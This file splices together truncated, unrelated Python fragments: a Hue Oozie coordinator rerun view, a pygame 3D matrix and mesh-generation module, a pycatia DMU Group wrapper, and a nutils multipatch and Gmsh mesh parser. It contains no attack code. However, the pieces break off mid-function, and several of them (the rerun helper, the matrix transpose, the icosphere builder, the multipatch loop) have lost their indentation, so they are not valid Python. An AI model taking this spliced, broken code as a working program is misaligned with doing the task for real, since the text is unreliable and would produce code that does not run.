    if request.method == 'POST':
        params_form = ParametersFormSet(request.POST)
        rerun_form = RerunCoordForm(request.POST, oozie_coordinator=oozie_coordinator)
        # Both forms must validate before resubmitting.
        if sum([rerun_form.is_valid(), params_form.is_valid()]) == 2:
            args = {}
            args['deployment_dir'] = app_path
            params = {
                'type': 'action',
                # 'aggreate' [sic] is the coordinator helper that collapses the
                # selected action numbers into Oozie scope ranges.
                'scope': ','.join(oozie_coordinator.aggreate(rerun_form.cleaned_data['actions'])),
                'refresh': rerun_form.cleaned_data['refresh'],
                'nocleanup': rerun_form.cleaned_data['nocleanup'],
            }
            properties = dict([(param['name'], param['value']) for param in params_form.cleaned_data])
            _rerun_coordinator(request, job_id, args, params, properties)
            request.info(_('Coordinator re-running.'))
            return redirect(reverse('oozie:list_oozie_coordinator', kwargs={'job_id': job_id}))
        else:
            request.error(_('Invalid submission form: %s' % (rerun_form.errors,)))
            return list_oozie_coordinator(request, job_id)
    else:
        rerun_form = RerunCoordForm(oozie_coordinator=oozie_coordinator)
        initial_params = ParameterForm.get_initial_params(oozie_coordinator.conf_dict)
        params_form = ParametersFormSet(initial=initial_params)
    popup = render('dashboard/rerun_coord_popup.mako', request, {
        'rerun_form': rerun_form,
        'params_form': params_form,
        'action': reverse('oozie:rerun_oozie_coord', kwargs={'job_id': job_id, 'app_path': app_path}),
    }, force_template=True).content
    return HttpResponse(json.dumps(popup), mimetype="application/json")
def _rerun_coordinator(request, oozie_id, args, params, properties):
try:
submission = Submission(user=request.user, | |
transpose(self):
temp = [[0 for i in range(self.col)] for j in range(self.row)]
for x in range(self.row):
for y in range(self.col):
temp[x][y] = self.val[y][x]
self.val = temp
    def __repr__(self):
        # Debug-friendly representation showing the raw row-major value table.
        return f'matrix->{self.val}'
def multiplyMatrix(m1, m2):
    """Return the matrix product m1 x m2 as a new Matrix.

    Each entry is the dot product of a row of ``m1`` with a column of
    ``m2``, rounded to 5 decimal places. Returns None (after printing a
    diagnostic) when the inner dimensions do not match.
    """
    # Validate dimensions before allocating the result (the original built
    # the result matrix even for incompatible operands).
    if m1.col != m2.row:
        print("we can't multiply these two matrices")
        return None
    m = Matrix(m1.row, m2.col)
    for x in range(m1.row):
        for y in range(m2.col):
            acc = 0  # renamed from 'sum' to avoid shadowing the builtin
            for z in range(m1.col):
                acc += m1.val[x][z] * m2.val[z][y]
            m.val[x][y] = round(acc, 5)
    return m
def multiplyMatrixVector(vec, mat):
    """Multiply a Vector3, as a 1x4 homogeneous row vector, by a 4x4 matrix.

    Applies the perspective divide by the resulting w component when it is
    non-zero and returns a Vector3.
    """
    temp = Matrix(1, 4)
    # assumes vec.toMatrix() yields the homogeneous row [[x, y, z, 1]] -- confirm
    temp.val = vec.toMatrix()
    m = multiplyMatrix(temp, mat)
    v = toVector3(m)
    # Perspective divide: normalise by w unless it is exactly zero.
    if m.val[0][3] != 0:
        v = v / m.val[0][3]
    return v
def TransposeMatrix(m):
    """Return a new Matrix that is the transpose of ``m``.

    Fix: the original allocated the result as Matrix(m.row, m.col) and ranged
    the loops over (m.row, m.col) while indexing m.val[y][x], which raises
    IndexError (or writes the wrong shape) for non-square matrices. The
    transpose of an r x c matrix is c x r; behaviour for square matrices
    (the common 4x4 case) is unchanged.
    """
    m1 = Matrix(m.col, m.row)
    for x in range(m.col):
        for y in range(m.row):
            m1.val[x][y] = m.val[y][x]
    return m1
def Determinant2x2(matrix):
    """Determinant of a 2x2 matrix (ad - bc), read from ``matrix.val``."""
    v = matrix.val
    return v[0][0] * v[1][1] - v[0][1] * v[1][0]
def submatrix(matrix, row, column):
    """Return a copy of ``matrix`` with the given row and column removed.

    The input matrix is left untouched; the copy's bookkeeping is refreshed
    via its updateInfo() method.
    """
    reduced = deepcopy(matrix)
    reduced.val = [
        [cell for c, cell in enumerate(r) if c != column]
        for i, r in enumerate(reduced.val)
        if i != row
    ]
    reduced.updateInfo()
    return reduced
def Minor3x3(matrix, row, column):
    """Minor of ``matrix`` at (row, column): the determinant of the matrix
    with that row and column struck out."""
    reduced = submatrix(matrix, row, column)
    # Recurse for anything larger than 2x2, otherwise use the closed form.
    return Determinant(reduced) if len(reduced.val) > 2 else Determinant2x2(reduced)
def Cofactor3x3(matrix, row, column):
    """Signed minor (cofactor) of ``matrix`` at (row, column)."""
    sign = 1 if (row + column) % 2 == 0 else -1
    return sign * Minor3x3(matrix, row, column)
def Determinant(matrix):
    """Determinant of a square Matrix via cofactor (Laplace) expansion along
    row 0, with a closed-form 2x2 base case.

    Fix: the base case previously called Determinant2x2(matrix.val), passing
    the raw list-of-lists; Determinant2x2 dereferences its argument's .val
    attribute, so that path raised AttributeError. It now passes the Matrix
    object itself.
    """
    if matrix.row == 2:
        return Determinant2x2(matrix)
    else:
        d = 0
        for j in range(len(matrix.val[0])):
            c = Cofactor3x3(matrix, 0, j)
            d += c * matrix.val[0][j]
        return d
def MatrixInversion(matrix):
    """Inverse of ``matrix`` via the adjugate (cofactor) method.

    Prints a diagnostic and returns None when the matrix is singular.
    Entries are rounded to 6 decimals before the final in-place transpose,
    matching the behaviour of the original implementation.
    """
    det = Determinant(matrix)
    if det == 0:
        print("this matrix is not invertible")
        return None
    inverse = Matrix(matrix.row, matrix.col)
    for r in range(matrix.row):
        for c in range(matrix.col):
            inverse.val[r][c] = round(Cofactor3x3(matrix, r, c) / det, 6)
    # Adjugate = transpose of the cofactor matrix.
    inverse.transpose()
    return inverse
def QuickInverse(m):
    """Fast inverse of a rigid-body 4x4 transform (rotation + translation).

    Transposes the upper-left 3x3 rotation block and recomputes the
    translation row against that transposed block. Only valid when ``m``
    contains no scale, shear or projection terms.
    """
    matrix = Matrix()
    # Transposed rotation block (rows and columns swapped), w column zeroed.
    matrix.val[0][0], matrix.val[0][1], matrix.val[0][2], matrix.val[0][3] = m.val[0][0], m.val[1][0], m.val[2][0], 0.0
    matrix.val[1][0], matrix.val[1][1], matrix.val[1][2], matrix.val[1][3] = m.val[0][1], m.val[1][1], m.val[2][1], 0.0
    matrix.val[2][0], matrix.val[2][1], matrix.val[2][2], matrix.val[2][3] = m.val[0][2], m.val[1][2], m.val[2][2], 0.0
    # Translation row: negated original translation times the transposed block.
    matrix.val[3][0] = -(m.val[3][0] * matrix.val[0][0] + m.val[3][1] * matrix.val[1][0] + m.val[3][2] * matrix.val[2][0])
    matrix.val[3][1] = -(m.val[3][0] * matrix.val[0][1] + m.val[3][1] * matrix.val[1][1] + m.val[3][2] * matrix.val[2][1])
    matrix.val[3][2] = -(m.val[3][0] * matrix.val[0][2] + m.val[3][1] * matrix.val[1][2] + m.val[3][2] * matrix.val[2][2])
    matrix.val[3][3] = 1.0
    return matrix
def translate(value, min1, max1, min2, max2):
    """Linearly remap ``value`` from the range [min1, max1] to [min2, max2]."""
    fraction = (value - min1) / (max1 - min1)
    return min2 + fraction * (max2 - min2)
def CubeTriangles(color, position=None, scale=1):
    """Triangle list for an axis-aligned cube of half-extent ``scale``
    centred at ``position`` (origin by default): 12 triangles, 2 per face.

    Fix: the default ``position=Vector3()`` was a mutable default argument
    shared across calls; it is now created per call.
    """
    if position is None:
        position = Vector3()
    return [
        # z = -1 face
        Triangle(Vector3(-1.0, -1.0, -1.0) * scale + position, Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, color),
        Triangle(Vector3(-1.0, -1.0, -1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, Vector3(1.0, -1.0, -1.0) * scale + position, color),
        # x = +1 face
        Triangle(Vector3(1.0, -1.0, -1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, color),
        Triangle(Vector3(1.0, -1.0, -1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, Vector3(1.0, -1.0, 1.0) * scale + position, color),
        # z = +1 face
        Triangle(Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, color),
        Triangle(Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, 1.0) * scale + position, color),
        # x = -1 face
        Triangle(Vector3(-1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, -1.0) * scale + position, color),
        Triangle(Vector3(-1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(-1.0, -1.0, -1.0) * scale + position, color),
        # y = +1 face (top)
        Triangle(Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, color),
        Triangle(Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, color),
        # y = -1 face (bottom)
        Triangle(Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, -1.0) * scale + position, color),
        Triangle(Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, -1.0) * scale + position, Vector3(1.0, -1.0, -1.0) * scale + position, color),
    ]
def QuadTriangles(color=(255, 255, 255), size=5):
    """Two triangles forming a square quad of half-extent ``size`` lying in
    the plane z = -size."""
    bottom_left = Vector3(-size, -size, -size)
    top_left = Vector3(-size, size, -size)
    top_right = Vector3(size, size, -size)
    bottom_right = Vector3(size, -size, -size)
    return [
        Triangle(bottom_left, top_left, top_right, color),
        Triangle(bottom_left, top_right, bottom_right, color),
    ]
def PlaneTriangles(color=(255, 255, 255), resolution=10, size=2):
    """Triangulated square plane in the XZ plane (y = 0).

    Builds a resolution x resolution grid of vertices spanning [-size, size)
    and stitches each grid cell with two triangles.
    """
    grid = [
        [
            Vector3(
                translate(i, 0, resolution, -size, size),
                0,
                translate(j, 0, resolution, -size, size),
            )
            for j in range(resolution)
        ]
        for i in range(resolution)
    ]
    meshData = []
    for i in range(resolution - 1):
        for j in range(resolution - 1):
            corner = grid[i][j]
            right = grid[i + 1][j]
            below = grid[i][j + 1]
            opposite = grid[i + 1][j + 1]
            # Two triangles per cell; winding matches the original.
            meshData.append(Triangle(corner, right, below, color))
            meshData.append(Triangle(opposite, below, right, color))
    return meshData
class Point:
    """A single 3D point that can be transformed, projected and drawn."""

    def __init__(self, position, color=(255, 255, 255), radius=10):
        # position: model-space Vector3; transform: 4x4 model matrix.
        self.position = position
        self.color = color
        self.radius = radius
        self.transform = Matrix.identity()

    def update(self, screen, camera, showPoint=False):
        """Run the point through the model/view/projection pipeline.

        Returns the screen-space position (a Vector3 whose x/y are pixel
        coordinates); when ``showPoint`` is True also draws it as a filled
        circle on ``screen``.
        """
        projected = None
        transformed = None
        transformed = multiplyMatrixVector(self.position, self.transform)
        # Push the scene away from the camera by the global Z offset.
        transformed += Vector3(0, 0, Zoffset)
        transformed = multiplyMatrixVector(transformed, camera.viewMatrix)
        projected = multiplyMatrixVector(transformed, camera.projection())
        # Flip x/y (screen y grows downwards), then map from [-1, 1] NDC
        # into [0, Width] x [0, Height] pixel coordinates.
        projected *= Vector3(-1, -1, 1)
        offsetView = Vector3(1, 1, 0)
        projected = projected + offsetView
        projected *= Vector3(Width, Height, 1) * 0.5
        if showPoint:
            pygame.draw.circle(screen, self.color, projected.GetTuple(), self.radius)
        return projected
def SphereTriangles(color, n_subdivision=10, radius=1):
    """Triangle list for a UV sphere centred at the origin.

    Vertices are a single top pole, n_subdivision rings of n_subdivision
    vertices each (latitude phi, longitude theta), and a bottom pole. The
    poles are closed with triangle fans and adjacent rings are stitched
    with two triangles per quad.
    """
    # simple UV SPHERE
    meshData = []
    vertices = []
    # adding top vertex
    vertices.append(Vector3(0, radius, 0))
    # generate vertices of the sphere, ring by ring
    for i in range(n_subdivision):
        phi = pi * (i+1) / n_subdivision
        for j in range(n_subdivision):
            theta = 2 * pi * j / n_subdivision
            x = radius * sin(phi) * cos(theta)
            y = radius * cos(phi)
            z = radius * sin(phi) * sin(theta)
            vertices.append(Vector3(x, y, z))
    # add bottom vertex
    vertices.append(Vector3(0, -radius, 0))
    # add top and bottom triangle fans (1-based because of the top vertex)
    for i in range(n_subdivision):
        i0 = i + 1
        i1 = (i+1) % n_subdivision + 1
        meshData.append(Triangle(vertices[0], vertices[i1], vertices[i0], color))
        i0 = i + n_subdivision * (n_subdivision - 2) + 1
        i1 = (i+1) % n_subdivision + n_subdivision * (n_subdivision - 2) + 1
        meshData.append(Triangle(vertices[-1], vertices[i1], vertices[i0], color))
    # stitch neighbouring rings: each quad becomes two triangles
    for j in range(n_subdivision-2):
        j0 = j * n_subdivision + 1
        j1 = (j+1) * n_subdivision + 1
        for i in range(n_subdivision):
            i0 = j0 + i
            i1 = j0 + (i + 1) % n_subdivision
            i2 = j1 + (i + 1) % n_subdivision
            i3 = j1 + i
            meshData.append(Triangle(vertices[i0], vertices[i1], vertices[i2], color))
            meshData.append(Triangle(vertices[i0], vertices[i2], vertices[i3], color))
    return meshData
def GetMiddlePoint(vec1, vec2, vertices, middlePointCache):
    """Return the index of the normalized midpoint of edge (vec1, vec2).

    When the edge has already been split, the cached vertex index is reused
    so no duplicate vertices are appended to ``vertices``.
    """
    a = vertices.index(vec1)
    b = vertices.index(vec2)
    # The cache key is order-independent: always "smaller, greater".
    lo, hi = (a, b) if a < b else (b, a)
    key = f"{lo}, {hi}"
    if key in middlePointCache:
        return middlePointCache[key]
    midpoint = Normalize((vertices[a] + vertices[b]) / 2)
    vertices.append(midpoint)
    _index = vertices.index(midpoint)
    middlePointCache[key] = _index
    return _index
def IcosphereTriangles(color=(255, 255, 255), subdivision=0, radius=1):
middlePointCache = {}
g = (1 + sqrt(5))/2 #golden ratio
vertices = [
Normalize(Vector3(-1, g, 0)),
Normalize(Vector3( 1, g, 0)),
Normalize(Vector3(-1, -g, 0)),
Normalize(Vector3( 1, -g, 0)),
Normalize(Vector3( 0, -1, g)),
Normalize(Vector3( 0, 1, g)),
Normalize(Vector3( 0, -1, -g)),
Normalize(Vector3( 0, 1, -g)),
Normalize(Vector3( g, 0, -1)),
Normalize(Vector3( g, 0, 1)),
Normalize(Vector3( -g, 0, -1)),
Normalize(Vector3( -g, 0, 1))
]
triangles = [
# 5 faces around point 0
Triangle(vertices[0], vertices[11], vertices[5], color),
Triangle(vertices[0], vertices[5], vertices[1], color),
Triangle(vertices[0], vertices[1], vertices[7], color),
Triangle(vertices[0], vertices[7], vertices[10], color),
Triangle(vertices[0], vertices[10], vertices[11], color),
# Adjacent faces
Triangle(vertices[1], vertices[5], vertices[9], color),
Triangle(vertices[5], vertices[11], vertices[4], color),
Triangle(vertices[11], vertices[10], vertices[2], color),
Triangle(vertices[10], vertices[7], vertices[6], color),
Triangle(vertices[7], vertices[1], vertices[8], color),
# 5 faces around 3
Triangle(vertices[3], vertices[9], vertices[4], color),
Triangle(vertices[3], vertices[4], vertices[2], color),
Triangle(vertices[3], vertices[2], vertices[6], color),
Triangle(vertices[3], vertices[6], vertices[8], color),
Triangle(vertices[3], vertices[8], vertices[9], color),
# Adjacent faces
Triangle(vertices[4], vertices[9], vertices[5], color),
Triangle(vertices[2], vertices[4], vertices[11], color),
Triangle(vertices[6], vertices[2], vertices[10], color),
Triangle(vertices[8], vertices[6], vertices[7], color),
Triangle(vertices[9], vertices[8], vertices[1], color)
]
# subdivision
for i in range(subdivision):
subdivisions = []
for triangle in triangles:
_i0 = GetMiddlePoint(triangle.vertex1, triangle.vertex2, vertices, middlePointCache)
_i1 = GetMiddlePoint(triangle.vertex2, triangle.vertex3, vertices, middlePointCache)
_i2 = GetMiddlePoint(triangle.vertex3, triangle.vertex1, vertices, middlePointCache)
vertex1 = vertices[_i0]
vertex2 = vertices[_i1]
| |
# pycatia/navigator_interfaces/group.py
#!/usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.product_structure_interfaces.product import Product
from pycatia.system_interfaces.any_object import AnyObject
from pycatia.types.general import cat_variant
class Group(AnyObject):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| Group
|
| Represents a DMU group.
| The DMU group is an entity which gathers references to several products in
| order to automate validation and verification of the Digital
| Mock-Up.
|
| A user can build a group using several methods: explicitly point out some
| products or take all products by default. The designated products can be
| intermediate or terminal node of the product structure. For instance, a user
| who has to verify the integration of the engine in engine bay may define a
| group with the engine assembly or with all the parts from the engine in order
| to detect clashes. In the first case this user has to add the engine assembly
| (as a product) in the group, and in the second case, to add all the parts to
| the group. Obviously, when a modification happens to the engine assembly the
| user has to change the group only in the second case. To manage the explicit
| definition of the group, one may use the XxxxExplicit methods.
|
| When the system takes the group into account to perform a given task, it may be
| necessary to retrieve:
|
| The products designated by the user (For example, the section of these
| products)
| The terminal nodes (or leaves) of the product (For example, clash detection
| takes into account terminal nodes)
| The set of products in the product structure which are not selected (For
| example, hide all products which are not in the group)
| The set of terminal nodes which are not selected (For example, clash of
| some products against all others).
|
| To perform these treatments one may use YyyyExtract or ZzzzInvert
| methods.
"""
    def __init__(self, com_object):
        """Wrap the raw DMU ``Group`` COM object."""
        super().__init__(com_object)
        # Typed alias to the underlying COM object used by the wrappers below.
        self.group = com_object
    @property
    def extract_mode(self) -> int:
        """Mode used by the extraction methods.

        CAA V5 Visual Basic Help: ``Property ExtractMode() As long``

        Values:
            0: extraction returns the products of the group themselves
               (intermediate or terminal nodes).
            1: extraction returns the terminal nodes of the products of
               the group.

        Example (VB)::

            Dim Mode As Integer
            Mode = NewGroup.ExtractMode
            NewGroup.ExtractMode = 1

        :return: the extraction mode
        :rtype: int
        """
        return self.group.ExtractMode
    @extract_mode.setter
    def extract_mode(self, value: int):
        """Set the extraction mode (see the property getter for values).

        :param int value: 0 (products) or 1 (terminal nodes)
        """
        self.group.ExtractMode = value
    def add_explicit(self, i_product: AnyObject) -> None:
        """Add a product to the group.

        CAA V5 Visual Basic Help:
        ``Sub AddExplicit(CATBaseDispatch iProduct)``

        Example (VB): ``NewGroup.AddExplicit MyProduct``

        :param AnyObject i_product: the product to add
        :return: None
        :rtype: None
        """
        return self.group.AddExplicit(i_product.com_object)
    def count_explicit(self) -> int:
        """Return the number of products explicitly added to the group.

        CAA V5 Visual Basic Help: ``Func CountExplicit() As long``

        Example (VB): ``number = NewGroup.CountExplicit``

        :return: the number of products in the group
        :rtype: int
        """
        return self.group.CountExplicit()
    def count_extract(self) -> int:
        """Return the number of products which can be extracted from the group.

        Depending on :attr:`extract_mode`, the extracted products are either
        the products of the group themselves (mode 0, intermediate or
        terminal nodes) or their terminal nodes (mode 1).

        CAA V5 Visual Basic Help: ``Func CountExtract() As long``

        Example (VB): ``number = NewGroup.CountExtract``

        :return: the number of extractable products
        :rtype: int
        """
        return self.group.CountExtract()
    def count_invert(self) -> int:
        """Return the number of terminal node products which cannot be
        extracted from the group (the complement of the extraction).

        CAA V5 Visual Basic Help: ``Func CountInvert() As long``

        Example (VB): ``number = NewGroup.CountInvert``

        :return: the number of non-extractable terminal node products
        :rtype: int
        """
        return self.group.CountInvert()
    def fill_sel_with_extract(self) -> None:
        """Fill the CATIA selection with all products which can be extracted
        from the group.

        CAA V5 Visual Basic Help: ``Sub FillSelWithExtract()``

        Example (VB): ``NewGroup.FillSelWithExtract``

        :return: None
        :rtype: None
        """
        return self.group.FillSelWithExtract()
    def fill_sel_with_invert(self) -> None:
        """Fill the CATIA selection with all terminal node products which
        cannot be extracted from the group.

        CAA V5 Visual Basic Help: ``Sub FillSelWithInvert()``

        Example (VB): ``NewGroup.FillSelWithInvert``

        :return: None
        :rtype: None
        """
        return self.group.FillSelWithInvert()
    def item_explicit(self, i_index: cat_variant) -> AnyObject:
        """Return a product of the group by its index.

        CAA V5 Visual Basic Help:
        ``Func ItemExplicit(CATVariant iIndex) As CATBaseDispatch``

        Example (VB): ``Set ThisProduct = NewGroup.ItemExplicit(9)``

        :param cat_variant i_index: 1-based index of the product; valid
            values run from 1 to :meth:`count_explicit`.
        :return: the retrieved product
        :rtype: AnyObject
        """
        return self.group.ItemExplicit(i_index)
def item_extract(self, i_index: cat_variant) -> Product:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func ItemExtract(CATVariant iIndex) As Product
|
| Returns a product which can be extracted from the group using its
| index.
|
| Parameters:
|
| iIndex
| The index of the product in the group. The index of the first
| product is 1, and the index of the last product is CountExtract.
|
|
| Returns:
| The retrieved product
| Example:
|
| This example retrieves in ThisProduct the ninth
| product
| |
indices = set(patches.flat)
if tuple(sorted(indices)) != tuple(range(len(indices))):
raise ValueError('Patch vertices in `patches` should be numbered consecutively, starting at 0.')
if len(patchverts) != len(indices):
raise ValueError('Number of `patchverts` does not equal number of vertices specified in `patches`.')
if len(patchverts.shape) != 2:
raise ValueError('Every patch vertex should be an array of dimension 1.')
topos = []
coords = []
for i, patch in enumerate(patches):
# find shape of patch and local patch coordinates
shape = []
for dim in range(ndims):
nelems_sides = []
sides = [(0,1)]*ndims
sides[dim] = slice(None),
for side in itertools.product(*sides):
sideverts = frozenset(patch[side])
if sideverts in nelems:
nelems_sides.append(nelems[sideverts])
else:
nelems_sides.append(nelems[None])
if len(set(nelems_sides)) != 1:
raise ValueError('duplicate number of elements specified for patch {} in dimension {}'.format(i, dim))
shape.append(nelems_sides[0])
# create patch topology
topos.append(rectilinear(shape, name='{}{}'.format(name, i))[0])
# compute patch geometry
patchcoords = [numpy.linspace(0, 1, n+1) for n in shape]
patchcoords = numeric.meshgrid(*patchcoords).reshape(ndims, -1)
if patchverts is not None:
patchcoords = numpy.array([
sum(
patchverts[j]*util.product(c if s else 1-c for c, s in zip(coord, side))
for j, side in zip(patch.flat, itertools.product(*[[0,1]]*ndims))
)
for coord in patchcoords.T
]).T
coords.append(patchcoords)
# build patch boundary data
boundarydata = topology.MultipatchTopology.build_boundarydata(patches)
# join patch topologies, geometries
topo = topology.MultipatchTopology(tuple(map(topology.Patch, topos, patches, boundarydata)))
funcsp = topo.basis('spline', degree=1, patchcontinuous=False)
geom = (funcsp * numpy.concatenate(coords, axis=1)).sum(-1)
return topo, geom
@cache.function
def parsegmsh(mshdata):
    """Gmsh parser

    Parser for Gmsh data in ``msh2`` or ``msh4`` format. See the `Gmsh manual
    <http://geuz.org/gmsh/doc/texinfo/gmsh.html>`_ for details.

    Parameters
    ----------
    mshdata : :class:`io.BufferedIOBase`
        Msh file contents.

    Returns
    -------
    :class:`dict`:
        Keyword arguments for :func:`simplex`
    """

    # meshio is an optional dependency, imported lazily.
    try:
        from meshio import gmsh
    except ImportError as e:
        raise Exception('parsegmsh requires the meshio module to be installed') from e
    msh = gmsh.main.read_buffer(mshdata)
    if not msh.cell_sets:
        # Old versions of the gmsh file format repeat elements that have multiple
        # tags. To support this we edit the meshio data to bring it in the same
        # form as the new files by deduplicating cells and creating cell_sets.
        renums = []
        for icell, cells in enumerate(msh.cells):
            keep = (cells.data[1:] != cells.data[:-1]).any(axis=1)
            if keep.all():
                renum = numpy.arange(len(cells.data))
            else:
                msh.cells[icell] = cells._replace(data=cells.data[numpy.hstack([True, keep])])
                renum = numpy.hstack([0, keep.cumsum()])
            renums.append(renum)
        for name, (itag, nd) in msh.field_data.items():
            msh.cell_sets[name] = [renum[data == itag] for data, renum in zip(msh.cell_data['gmsh:physical'], renums)]
    # Coords is a 2d float-array such that coords[inode,idim] == coordinate.
    coords = msh.points
    # Nodes is a dictionary that maps a topological dimension to a 2d int-array
    # dictionary such that nodes[nd][ielem,ilocal] == inode, where ilocal < nd+1
    # for linear geometries or larger for higher order geometries. Since meshio
    # stores nodes by simplex type and cell, simplex types are mapped to
    # dimensions and gathered, after which cells are concatenated under the
    # assumption that there is only one simplex type per dimension.
    nodes = {('ver','lin','tri','tet').index(typename[:3]): numpy.concatenate(datas, axis=0)
        for typename, datas in util.gather((cells.type, cells.data) for cells in msh.cells)}
    # Identities is a 2d [master, slave] int-array that pairs matching nodes on
    # periodic walls. For the topological connectivity, all slaves in the nodes
    # arrays will be replaced by their master counterpart.
    # NOTE(review): the unpack below reads column 0 as slaves, column 1 as
    # masters -- the opposite of this comment's [master, slave]; confirm which
    # ordering msh.gmsh_periodic actually delivers.
    identities = numpy.zeros((0, 2), dtype=int) if not msh.gmsh_periodic \
        else numpy.concatenate([d for a, b, c, d in msh.gmsh_periodic], axis=0)
    # Tags is a list of (nd, name, ndelems) tuples that define topological groups
    # per dimension. Since meshio associates group names with cells, which are
    # concatenated in nodes, element ids are offset and concatenated to match.
    tags = [(msh.field_data[name][1], name, numpy.concatenate([selection
        + sum(len(cells.data) for cells in msh.cells[:icell] if cells.type == msh.cells[icell].type) # offset into nodes
        for icell, selection in enumerate(selections)]))
            for name, selections in msh.cell_sets.items()]
    # determine the dimension of the topology
    ndims = max(nodes)
    # determine the dimension of the geometry
    assert not numpy.isnan(coords).any()
    while coords.shape[1] > ndims and not coords[:,-1].any():
        coords = coords[:,:-1]
    # separate geometric, topological nodes
    cnodes = nodes[ndims]
    if cnodes.shape[1] > ndims+1: # higher order geometry
        nodes = {nd: n[:,:nd+1] for nd, n in nodes.items()} # remove high order info
    if len(identities):
        slaves, masters = identities.T
        keep = numpy.ones(len(coords), dtype=bool)
        keep[slaves] = False
        assert keep[masters].all()
        renumber = keep.cumsum()-1
        renumber[slaves] = renumber[masters]
        nodes = {nd: renumber[n] for nd, n in nodes.items()}
    vnodes = nodes[ndims]
    bnodes = nodes.get(ndims-1)
    pnodes = nodes.get(0)
    if cnodes is vnodes: # geometry is linear and non-periodic, dofs follow in-place sorting of nodes
        degree = 1
    elif cnodes.shape[1] == ndims+1: # linear elements: match sorting of nodes
        degree = 1
        shuffle = vnodes.argsort(axis=1)
        cnodes = cnodes[numpy.arange(len(cnodes))[:,_], shuffle] # gmsh conveniently places the primary ndim+1 vertices first
    else: # higher order elements: match sorting of nodes and renumber higher order coefficients
        degree, nodeorder = { # for meshio's node ordering conventions see http://www.vtk.org/VTK/img/file-formats.pdf
            (2, 6): (2, (0,3,1,5,4,2)),
            (2,10): (3, (0,3,4,1,8,9,5,7,6,2)),
            (2,15): (4, (0,3,4,5,1,11,12,13,6,10,14,7,9,8,2)),
            (3,10): (2, (0,4,1,6,5,2,7,8,9,3))}[ndims, cnodes.shape[1]]
        enum = numpy.empty([degree+1]*(ndims+1), dtype=int)
        bari = tuple(numpy.array([index[::-1] for index in numpy.ndindex(*enum.shape) if sum(index) == degree]).T)
        enum[bari] = numpy.arange(cnodes.shape[1]) # maps baricentric index to corresponding enumerated index
        shuffle = vnodes.argsort(axis=1)
        cnodes = cnodes[:,nodeorder] # convert from gmsh to nutils order
        for i in range(ndims): # strategy: apply shuffle to cnodes by sequentially swapping vertices...
            for j in range(i+1, ndims+1): # ...considering all j > i pairs...
                m = shuffle[:,i] == j # ...and swap vertices if vertex j is shuffled into i...
                r = enum.swapaxes(i,j)[bari] # ...using the enum table to generate the appropriate renumbering
                cnodes[m,:] = cnodes[numpy.ix_(m,r)]
                m = shuffle[:,j] == i
                shuffle[m,j] = shuffle[m,i] # update shuffle to track changed vertex positions
    vnodes.sort(axis=1)
    nnodes = vnodes[:,-1].max()+1
    vtags, btags, ptags = {}, {}, {}
    edge_vertices = numpy.arange(ndims+1).repeat(ndims).reshape(ndims, ndims+1)[:,::-1].T # nedges x ndims
    for nd, name, ielems in tags:
        if nd == ndims:
            vtags[name] = numpy.array(ielems)
        elif nd == ndims-1:
            edgenodes = bnodes[ielems]
            nodemask = numeric.asboolean(edgenodes.ravel(), size=nnodes, ordered=False)
            ielems, = (nodemask[vnodes].sum(axis=1) >= ndims).nonzero() # all elements sharing at least ndims edgenodes
            edgemap = {tuple(b): (ielem, iedge) for ielem, a in zip(ielems, vnodes[ielems[:,_,_], edge_vertices[_,:,:]]) for iedge, b in enumerate(a)}
            btags[name] = numpy.array([edgemap[tuple(sorted(n))] for n in edgenodes])
        elif nd == 0:
            ptags[name] = pnodes[ielems][...,0]
    log.info('\n- '.join(['loaded {}d gmsh topology consisting of #{} elements'.format(ndims, len(cnodes))]
        + [name + ' groups: ' + ', '.join('{} #{}'.format(n, len(e)) for n, e in tags.items())
            for name, tags in (('volume', vtags), ('boundary', btags), ('point', ptags)) if tags]))
    return dict(nodes=vnodes, cnodes=cnodes, coords=coords, tags=vtags, btags=btags, ptags=ptags)
@log.withcontext
@types.apply_annotations
def gmsh(fname:util.binaryfile, name='gmsh'):
  """Gmsh parser

  Read a Gmsh ``.msh`` file and build the corresponding simplex topology.
  Only meshes that define physical groups are supported; see the `Gmsh
  manual <http://geuz.org/gmsh/doc/texinfo/gmsh.html>`_ for details.

  Parameters
  ----------
  fname : :class:`str` or :class:`io.BufferedIOBase`
      Path to mesh file or mesh file object.
  name : :class:`str` or :any:`None`
      Name of parsed topology, defaults to 'gmsh'.

  Returns
  -------
  topo : :class:`nutils.topology.SimplexTopology`
      Topology of parsed Gmsh file.
  geom : :class:`nutils.function.Array`
      Isoparametric map.
  """
  with fname as f:
    parsed = parsegmsh(f)
    return simplex(name=name, **parsed)
def simplex(nodes, cnodes, coords, tags, btags, ptags, name='simplex'):
'''Simplex topology.
Parameters
----------
nodes : :class:`numpy.ndarray`
Vertex indices as (nelems x ndims+1) integer array, sorted along the
